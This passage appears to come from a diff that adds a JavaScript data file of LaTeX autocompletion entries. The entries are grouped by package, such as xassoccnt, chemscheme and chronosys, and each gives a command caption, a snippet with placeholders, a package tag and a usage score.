'\\leftroot{}', + snippet: '\\leftroot{$1}', + meta: 'cool-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\substack{}', + snippet: '\\substack{$1}', + meta: 'cool-cmd', + score: 0.0037482529712850755, + }, + { + caption: '\\Hat{}', + snippet: '\\Hat{$1}', + meta: 'cool-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\frac{}{}', + snippet: '\\frac{$1}{$2}', + meta: 'cool-cmd', + score: 1.4341091141105058, + }, + { + caption: '\\mspace{}', + snippet: '\\mspace{$1}', + meta: 'cool-cmd', + score: 3.423236656565836e-5, + }, + { + caption: '\\Bar{}', + snippet: '\\Bar{$1}', + meta: 'cool-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\Grave{}', + snippet: '\\Grave{$1}', + meta: 'cool-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\implies', + snippet: '\\implies', + meta: 'cool-cmd', + score: 0.021828316911576096, + }, + { + caption: '\\tbinom', + snippet: '\\tbinom', + meta: 'cool-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\dotsi', + snippet: '\\dotsi', + meta: 'cool-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\bigwedge', + snippet: '\\bigwedge', + meta: 'cool-cmd', + score: 0.000347742918592393, + }, + { + caption: '\\sideset{}{}', + snippet: '\\sideset{$1}{$2}', + meta: 'cool-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\smash{}', + snippet: '\\smash{$1}', + meta: 'cool-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\smash[]{}', + snippet: '\\smash[$1]{$2}', + meta: 'cool-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\colon', + snippet: '\\colon', + meta: 'cool-cmd', + score: 0.005300291684408929, + }, + { + caption: '\\intertext{}', + snippet: '\\intertext{$1}', + meta: 'cool-cmd', + score: 0.0016148076375871775, + }, + { + caption: '\\Longleftarrow', + snippet: '\\Longleftarrow', + meta: 'cool-cmd', + score: 8.477207854183949e-5, + }, + { + caption: '\\prod', + snippet: '\\prod', + meta: 'cool-cmd', + score: 0.02549889375975901, + }, + { + caption: '\\AmS', + snippet: '\\AmS', + meta: 'cool-cmd', + score: 0.00047859486202980376, + }, + { + caption: '\\overline{}', + snippet: '\\overline{$1}', + meta: 'cool-cmd', + score: 0.11280487530505384, + }, + { + caption: '\\tfrac{}{}', + snippet: '\\tfrac{$1}{$2}', + meta: 'cool-cmd', + score: 0.0005923542426657187, + }, + { + caption: '\\uproot{}', + snippet: '\\uproot{$1}', + meta: 'cool-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\bmod', + snippet: '\\bmod', + meta: 'cool-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\bmod{}', + snippet: '\\bmod{$1}', + meta: 'cool-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\pod{}', + snippet: '\\pod{$1}', + meta: 'cool-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'cool-cmd', + score: 1.897791904799601, + }, + { + caption: '\\longrightarrow', + snippet: '\\longrightarrow', + meta: 'cool-cmd', + score: 0.013399422292458848, + }, + { + caption: '\\xleftarrow[]{}', + snippet: '\\xleftarrow[$1]{$2}', + meta: 'cool-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\xleftarrow{}', + snippet: '\\xleftarrow{$1}', + meta: 'cool-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\mathaccentV', + snippet: '\\mathaccentV', + meta: 'cool-cmd', + score: 6.216218551413489e-5, + }, + { + caption: '\\hdotsfor{}', + snippet: '\\hdotsfor{$1}', + meta: 'cool-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\hdotsfor[]{}', + snippet: '\\hdotsfor[$1]{$2}', + meta: 'cool-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\Bigg', + snippet: '\\Bigg', + meta: 'cool-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\Bigg[]', + snippet: '\\Bigg[$1]', + meta: 'cool-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\overset{}{}', + snippet: '\\overset{$1}{$2}', + meta: 'cool-cmd', + score: 0.007611544955294224, + }, + { + caption: '\\Big', + snippet: '\\Big', + meta: 'cool-cmd', + score: 0.050370758781422345, + }, + { + caption: '\\longleftrightarrow', + snippet: '\\longleftrightarrow', + meta: 'cool-cmd', + score: 0.0002851769278703356, + }, + { + caption: '\\Longleftrightarrow', + snippet: '\\Longleftrightarrow', + meta: 'cool-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\Longleftrightarrow{}', + snippet: '\\Longleftrightarrow{$1}', + meta: 'cool-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\binom{}{}', + snippet: '\\binom{$1}{$2}', + meta: 'cool-cmd', + score: 0.013010882180364367, + }, + { + caption: '\\longleftarrow', + snippet: '\\longleftarrow', + meta: 'cool-cmd', + score: 0.0011096532692473691, + }, + { + caption: '\\dbinom{}{}', + snippet: '\\dbinom{$1}{$2}', + meta: 'cool-cmd', + score: 0.006800272303210672, + }, + { + caption: '\\Tilde{}', + snippet: '\\Tilde{$1}', + meta: 'cool-cmd', + score: 7.874446783586035e-5, + }, + { + caption: '\\bigcup', + snippet: '\\bigcup', + meta: 'cool-cmd', + score: 0.0058847868741168765, + }, + { + caption: '\\sinh', + snippet: '\\sinh', + meta: 'cool-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\sinh{}', + snippet: '\\sinh{$1}', + meta: 'cool-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\operatorname{}', + snippet: '\\operatorname{$1}', + meta: 'cool-cmd', + score: 0.02181954887028883, + }, + { + caption: '\\max', + snippet: '\\max', + meta: 'cool-cmd', + score: 0.04116833357968482, + }, + { + caption: '\\liminf', + snippet: '\\liminf', + meta: 'cool-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\liminf{}', + snippet: '\\liminf{$1}', + meta: 'cool-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\operatornamewithlimits{}', + snippet: '\\operatornamewithlimits{$1}', + meta: 'cool-cmd', + score: 0.0022415507993352067, + }, + { + caption: '\\exp', + snippet: '\\exp', + meta: 'cool-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\exp{}', + snippet: '\\exp{$1}', + meta: 'cool-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\lim', + snippet: '\\lim', + meta: 'cool-cmd', + score: 0.05285123457928509, + }, + { + caption: '\\sin', + snippet: '\\sin', + meta: 'cool-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\sin{}', + snippet: '\\sin{$1}', + meta: 'cool-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\arg', + snippet: '\\arg', + meta: 'cool-cmd', + score: 0.007190995792600074, + }, + { + caption: '\\cos', + snippet: '\\cos', + meta: 'cool-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\cos{}', + snippet: '\\cos{$1}', + meta: 'cool-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\varliminf', + snippet: '\\varliminf', + meta: 'cool-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\hom', + snippet: '\\hom', + meta: 'cool-cmd', + score: 8.180643329881783e-5, + }, + { + caption: '\\tan', + snippet: '\\tan', + meta: 'cool-cmd', + score: 0.006176447465423192, + }, + { + caption: '\\det', + snippet: '\\det', + meta: 'cool-cmd', + score: 0.005640718203101287, + }, + { + caption: '\\ln', + snippet: '\\ln', + meta: 'cool-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\ln{}', + snippet: '\\ln{$1}', + meta: 'cool-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\cosh', + snippet: '\\cosh', + meta: 'cool-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\cosh{}', + snippet: '\\cosh{$1}', + meta: 'cool-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\gcd', + snippet: '\\gcd', + meta: 'cool-cmd', + score: 0.002254008371792865, + }, + { + caption: '\\limsup', + snippet: '\\limsup', + meta: 'cool-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\limsup{}', + snippet: '\\limsup{$1}', + meta: 'cool-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\inf', + snippet: '\\inf', + meta: 'cool-cmd', + score: 0.00340470256994063, + }, + { + caption: '\\arccos', + snippet: '\\arccos', + meta: 'cool-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\arccos{}', + snippet: '\\arccos{$1}', + meta: 'cool-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\ker', + snippet: '\\ker', + meta: 'cool-cmd', + score: 0.002475379242338094, + }, + { + caption: '\\cot', + snippet: '\\cot', + meta: 'cool-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\cot{}', + snippet: '\\cot{$1}', + meta: 'cool-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\coth{}', + snippet: '\\coth{$1}', + meta: 'cool-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\coth', + snippet: '\\coth', + meta: 'cool-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\varlimsup', + snippet: '\\varlimsup', + meta: 'cool-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\log', + snippet: '\\log', + meta: 'cool-cmd', + score: 0.048131780413380156, + }, + { + caption: '\\varinjlim', + snippet: '\\varinjlim', + meta: 'cool-cmd', + score: 0.000361814283649031, + }, + { + caption: '\\deg', + snippet: '\\deg', + meta: 'cool-cmd', + score: 0.005542465148816408, + }, + { + caption: '\\arctan', + snippet: '\\arctan', + meta: 'cool-cmd', + score: 0.0011971697553682045, + }, + { + caption: '\\dim', + snippet: '\\dim', + meta: 'cool-cmd', + score: 0.0038210003967178293, + }, + { + caption: '\\min', + snippet: '\\min', + meta: 'cool-cmd', + score: 0.03051120054363316, + }, + { + caption: '\\Pr', + snippet: '\\Pr', + meta: 'cool-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\Pr[]', + snippet: '\\Pr[$1]', + meta: 'cool-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\tanh', + snippet: '\\tanh', + meta: 'cool-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\tanh{}', + snippet: '\\tanh{$1}', + meta: 'cool-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\arcsin', + snippet: '\\arcsin', + meta: 'cool-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\arcsin{}', + snippet: '\\arcsin{$1}', + meta: 'cool-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\DeclareMathOperator{}{}', + snippet: '\\DeclareMathOperator{$1}{$2}', + meta: 'cool-cmd', + score: 0.029440493885398676, + }, + { + caption: '\\csc', + snippet: '\\csc', + meta: 'cool-cmd', + score: 0.00013963711107573638, + }, + { + caption: '\\sup', + snippet: '\\sup', + meta: 'cool-cmd', + score: 0.009355514755312534, + }, + { + caption: '\\sec', + snippet: '\\sec', + meta: 'cool-cmd', + score: 0.0005912636157903734, + }, + { + caption: '\\varprojlim', + snippet: '\\varprojlim', + meta: 'cool-cmd', + score: 0.0004286136584068833, + }, + { + caption: '\\frak{}', + snippet: '\\frak{$1}', + meta: 'cool-cmd', + score: 0.0017966000518546787, + }, + { + caption: '\\checkmark', + snippet: '\\checkmark', + meta: 'cool-cmd', + score: 0.025060530944368123, + }, + { + caption: '\\bold', + snippet: '\\bold', + meta: 'cool-cmd', + score: 0.0014358547624941567, + }, + { + caption: '\\bold{}', + snippet: '\\bold{$1}', + meta: 'cool-cmd', + score: 0.0014358547624941567, + }, + { + caption: '\\Bbb{}', + snippet: '\\Bbb{$1}', + meta: 'cool-cmd', + score: 0.0006671850995492977, + }, + { + caption: '\\Bbb', + snippet: '\\Bbb', + meta: 'cool-cmd', + score: 0.0006671850995492977, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'cool-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'cool-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\text{}', + snippet: '\\text{$1}', + meta: 'cool-cmd', + score: 0.3608680734736821, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'cool-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\pmb{}', + snippet: '\\pmb{$1}', + meta: 'cool-cmd', + score: 0.019171182556792562, + }, + { + caption: '\\boldsymbol{}', + snippet: '\\boldsymbol{$1}', + meta: 'cool-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\boldsymbol', + snippet: '\\boldsymbol', + meta: 'cool-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\forloop{}{}{}{}', + snippet: '\\forloop{$1}{$2}{$3}{$4}', + meta: 'cool-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'cool-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'cool-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'cool-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'cool-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'cool-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'cool-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'cool-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'cool-cmd', + score: 0.0063276692758974925, + }, + ], + xassoccnt: [ + { + caption: '\\NewTotalDocumentCounter{}', + snippet: '\\NewTotalDocumentCounter{$1}', + meta: 'xassoccnt-cmd', + score: 1.5075186740106946e-5, + }, + { + caption: '\\DeclareAssociatedCounters{}{}', + snippet: '\\DeclareAssociatedCounters{$1}{$2}', + meta: 'xassoccnt-cmd', + score: 1.5075186740106946e-5, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'xassoccnt-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'xassoccnt-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'xassoccnt-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'xassoccnt-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'xassoccnt-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'xassoccnt-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'xassoccnt-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'xassoccnt-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'xassoccnt-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'xassoccnt-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'xassoccnt-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'xassoccnt-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'xassoccnt-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'xassoccnt-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'xassoccnt-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'xassoccnt-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'xassoccnt-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'xassoccnt-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'xassoccnt-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'xassoccnt-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'xassoccnt-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'xassoccnt-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'xassoccnt-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'xassoccnt-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'xassoccnt-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'xassoccnt-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'xassoccnt-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'xassoccnt-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'xassoccnt-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'xassoccnt-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'xassoccnt-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'xassoccnt-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'xassoccnt-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'xassoccnt-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'xassoccnt-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'xassoccnt-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'xassoccnt-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'xassoccnt-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'xassoccnt-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'xassoccnt-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'xassoccnt-cmd', + score: 0.2864294797053033, + }, + ], + chemscheme: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'chemscheme-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'chemscheme-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'chemscheme-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'chemscheme-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'chemscheme-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'chemscheme-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'chemscheme-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'chemscheme-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'chemscheme-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'chemscheme-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'chemscheme-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'chemscheme-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'chemscheme-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'chemscheme-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'chemscheme-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'chemscheme-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'chemscheme-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'chemscheme-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'chemscheme-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'chemscheme-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'chemscheme-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'chemscheme-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'chemscheme-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'chemscheme-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'chemscheme-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'chemscheme-cmd', + score: 0.021170869458413965, + }, + ], + 'pst-all': [ + { + caption: '\\green', + snippet: '\\green', + meta: 'pst-all-cmd', + score: 0.0016005722621532548, + }, + { + caption: '\\green{}', + snippet: '\\green{$1}', + meta: 'pst-all-cmd', + score: 0.0016005722621532548, + }, + { + caption: '\\documentclass[]{}', + snippet: '\\documentclass[$1]{$2}', + meta: 'pst-all-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\documentclass{}', + snippet: '\\documentclass{$1}', + meta: 'pst-all-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\gray', + snippet: '\\gray', + meta: 'pst-all-cmd', + score: 0.0005786730478266738, + }, + { + caption: '\\red{}', + snippet: '\\red{$1}', + meta: 'pst-all-cmd', + score: 0.006520475264573554, + }, + { + caption: '\\red', + snippet: '\\red', + meta: 'pst-all-cmd', + score: 0.006520475264573554, + }, + ], + regexpatch: [ + { + caption: '\\xpatchcmd{}{}{}{}{}', + snippet: '\\xpatchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'regexpatch-cmd', + score: 0.0019344877752147675, + }, + { + caption: '\\xpatchcmd', + snippet: '\\xpatchcmd', + meta: 'regexpatch-cmd', + score: 0.0019344877752147675, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'regexpatch-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'regexpatch-cmd', + score: 0.2864294797053033, + }, + ], + chronosys: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'chronosys-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'chronosys-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'chronosys-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'chronosys-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'chronosys-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'chronosys-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'chronosys-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'chronosys-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'chronosys-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'chronosys-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'chronosys-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'chronosys-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'chronosys-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'chronosys-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'chronosys-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'chronosys-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'chronosys-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'chronosys-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'chronosys-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'chronosys-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'chronosys-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'chronosys-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'chronosys-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'chronosys-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'chronosys-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'chronosys-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'chronosys-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'chronosys-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'chronosys-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'chronosys-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'chronosys-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'chronosys-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'chronosys-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'chronosys-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'chronosys-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 